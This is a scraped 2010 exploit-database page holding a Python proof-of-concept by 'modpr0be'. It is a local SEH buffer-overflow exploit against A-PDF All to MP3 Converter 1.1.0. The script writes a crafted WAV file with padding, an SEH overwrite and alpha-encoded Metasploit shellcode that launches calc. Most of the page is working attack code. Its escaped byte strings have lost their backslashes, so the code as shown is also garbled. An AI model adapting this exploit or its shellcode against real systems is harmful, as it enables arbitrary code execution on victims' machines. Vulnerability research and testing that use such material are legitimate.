[local exploits] - A-PDF All to MP3 Converter v.1.1.0 Univer
Posted on 17 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local exploits | Exploit author: modpr0be' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================================================== A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit ============================================================== #!/usr/bin/python ################################################################################ # Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit # Date: September 18, 2010 # Author: modpr0be # Software Link: http://www.a-pdf.com/all-to-mp3/download.htm # Version: 1.1.0 # Tested on: Windows XP SP3 # # Open application --> Next --> Add --> blah.wav --> calc will pop out # # Other applications made by a-pdf may be affected. # this exploit is simply reference from EDB 14681 and 14676 # Exploit using direct EIP is also working. # # thx: amalia, offsec, xecureit, jasakom, oebaj, 0x70y, postnix. ################################################################################ import struct junk1 = 'A' * 4132 nseh = "xebx06x90x90" seh = struct.pack('<L', 0x00408B44) # ppr nops2 = "x90" * 12 # metasploit payload # windows/exec cmd=calc | msfencode -e x86/alpha_upper # size 462 bytes shellcode = ("x89xe1xdaxdexd9x71xf4x5ax4ax4ax4ax4ax4ax43x43" "x43x43x43x43x52x59x56x54x58x33x30x56x58x34x41" "x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42" "x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50" "x38x41x43x4ax4ax49x4bx4cx4dx38x4bx39x43x30x43" "x30x43x30x43x50x4cx49x4dx35x46x51x48x52x43x54" "x4cx4bx50x52x50x30x4cx4bx46x32x44x4cx4cx4bx50" "x52x44x54x4cx4bx44x32x51x38x44x4fx4ex57x50x4a" "x51x36x50x31x4bx4fx50x31x49x50x4ex4cx47x4cx45" "x31x43x4cx44x42x46x4cx47x50x49x51x48x4fx44x4d" "x45x51x4fx37x4dx32x4cx30x46x32x51x47x4cx4bx46" "x32x42x30x4cx4bx50x42x47x4cx43x31x48x50x4cx4b" "x47x30x43x48x4dx55x49x50x44x34x51x5ax43x31x4e" "x30x46x30x4cx4bx51x58x45x48x4cx4bx50x58x47x50" "x45x51x48x53x4dx33x47x4cx51x59x4cx4bx50x34x4c" "x4bx43x31x49x46x50x31x4bx4fx46x51x4fx30x4ex4c" "x4fx31x48x4fx44x4dx43x31x49x57x47x48x4bx50x44" "x35x4cx34x43x33x43x4dx4cx38x47x4bx43x4dx46x44" "x42x55x4bx52x51x48x4cx4bx51x48x51x34x43x31x48" "x53x45x36x4cx4bx44x4cx50x4bx4cx4bx50x58x45x4c" "x43x31x48x53x4cx4bx45x54x4cx4bx45x51x4ex30x4b" "x39x50x44x47x54x46x44x51x4bx51x4bx43x51x46x39" "x50x5ax50x51x4bx4fx4bx50x50x58x51x4fx51x4ax4c" "x4bx44x52x4ax4bx4dx56x51x4dx42x4ax43x31x4cx4d" "x4cx45x48x39x43x30x45x50x43x30x50x50x43x58x50" "x31x4cx4bx42x4fx4dx57x4bx4fx49x45x4fx4bx4cx30" "x48x35x49x32x50x56x45x38x4ex46x4dx45x4fx4dx4d" "x4dx4bx4fx48x55x47x4cx43x36x43x4cx45x5ax4bx30" "x4bx4bx4bx50x42x55x43x35x4fx4bx47x37x45x43x42" "x52x42x4fx43x5ax43x30x50x53x4bx4fx49x45x45x33" "x45x31x42x4cx45x33x43x30x45x5ax41x41") payload = junk1+nseh+seh+nops2+shellcode file = open('blah.wav','w') file.write(payload) file.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-17]</pre></body></html>
